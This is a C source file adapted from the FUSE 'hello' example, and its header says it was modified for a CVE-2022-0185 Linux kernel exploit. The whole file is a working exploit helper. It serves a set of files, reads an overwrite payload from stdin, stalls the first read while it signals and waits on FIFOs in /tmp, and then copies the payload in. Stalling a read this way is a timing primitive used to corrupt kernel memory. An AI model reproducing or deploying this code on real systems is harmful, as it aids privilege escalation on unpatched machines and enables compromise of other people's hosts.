/*
  FUSE: Filesystem in Userspace
  Copyright (C) 2001-2007  Miklos Szeredi <miklos@szeredi.hu>

  Jan 23, 2022 Alejandro Guerrero <aguerrero@qualys.com>:
  Note: Modified for CVE-2022-0185 exploit
  
  This program can be distributed under the terms of the GNU GPLv2.
  See the file COPYING.
*/

#define FUSE_USE_VERSION 31

#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
#include <err.h>
#include <sys/uio.h>

#define PAGE_SIZE 0x1000
#define SLP_TIME 5
#define FILE_N 0x8

#define FIFO_FILE "/tmp/flg_fifo"
#define FIFO_FILE_2 "/tmp/flg_fifo_2"

#define DEBUG 1

char ov_payload[PAGE_SIZE] = { 0 };

int f_flg = 1;

char *fuse_file[] = 
	{ "/a", "/b", "/c",
	"/d", "/e", "/f",
	"/g", "/h", NULL };

int release_fuse = 1;

int is_recognized_path(const char *path) {
	int ret = 0;
	for(int i = 0 ; i < FILE_N ; i++) {
		if(strcmp(path, fuse_file[i]) == 0) {
			ret = 1;
			break;
		}
	}
	return ret;
}

static int hello_getattr(const char *path, struct stat *stbuf) {
	int res = 0;

	#if DEBUG
	printf("[FUSE-HELLO] hello from getattr(%s)\n", path);
	#endif
	
	memset(stbuf, 0, sizeof(struct stat));
	if (strcmp(path, "/") == 0) {
		stbuf->st_mode = S_IFDIR | 0755;
		stbuf->st_nlink = 2;
	} else if (is_recognized_path(path)) {
		stbuf->st_mode = S_IFREG | 0666;
		stbuf->st_nlink = 1;
		stbuf->st_size = PAGE_SIZE;
		stbuf->st_blocks = 0;
	} else
		res = -ENOENT;
	return res;
}

static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
			 off_t offset, struct fuse_file_info *fi) {
	(void) offset;
	(void) fi;

	#if DEBUG
	puts("[FUSE-HELLO] hello from readdir()");
	#endif
	
	if (strcmp(path, "/") != 0)
		return -ENOENT;

	filler(buf, ".", NULL, 0);
	filler(buf, "..", NULL, 0);

	return 0;
}

static int hello_open(const char *path, struct fuse_file_info *fi) {
	#if DEBUG
	printf("[FUSE-HELLO] hello from open(%s)\n", path);
	#endif
	return 0;
}

int wait_till_fifo(void) {
	int lets_go = 0;
	int fd = 0;
	int r = 0;
	fd = open(FIFO_FILE_2, O_RDONLY);
	if(fd < 0)
		perror("[-] Error at open()");
	r = read(fd, &lets_go, sizeof(int));
	if(r < 0)
		perror("[-] Error at read()");
	close(fd);
	return lets_go;
}

void send_fifo(void) {
	int lets_go = 1;
	int fd = 0;
	int r = 0;
	fd = open(FIFO_FILE, O_WRONLY);
	if(fd < 0)
		perror("[-] Error at open()");
	r = write(fd, &lets_go, sizeof(int));
	if(r < 0)
		perror("[-] Error at write()");
	close(fd);
	return;
}

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
		      struct fuse_file_info *fi) {
	int go = 0;
	if(is_recognized_path(path)) {
		if(f_flg)
			send_fifo(); /* let parent know hang is active */
		
		#if DEBUG
		printf("[FUSE-HELLO] Copying: %p -> %p (%ld, off=%ld, path=%s)\n", ov_payload, buf, size, (off_t)offset, path);
		#endif
		
		if(f_flg) {
			go = wait_till_fifo(); /* wait for parent to let us release block */
			f_flg = 0;
			#if DEBUG
			puts("[FUSE-HELLO] Hang released!");
			#endif
		}
		memcpy(buf + offset, ov_payload, PAGE_SIZE);
	}
	return size;
}

static const struct fuse_operations hello_oper = {
	.getattr	= hello_getattr,
	.readdir	= hello_readdir,
	.open		= hello_open,
	.read		= hello_read,
};

int main(int argc, char *argv[]) {
	int r = 0;
	#if DEBUG
	puts("[FUSE-HELLO] hello started!");
	#endif
	r = read(0, ov_payload, PAGE_SIZE);
	if(r < 0)
		exit(1);
	#if DEBUG
	puts("[FUSE-HELLO] calling fuse_main()...");
	#endif
	return fuse_main(argc, argv, &hello_oper, NULL);
}


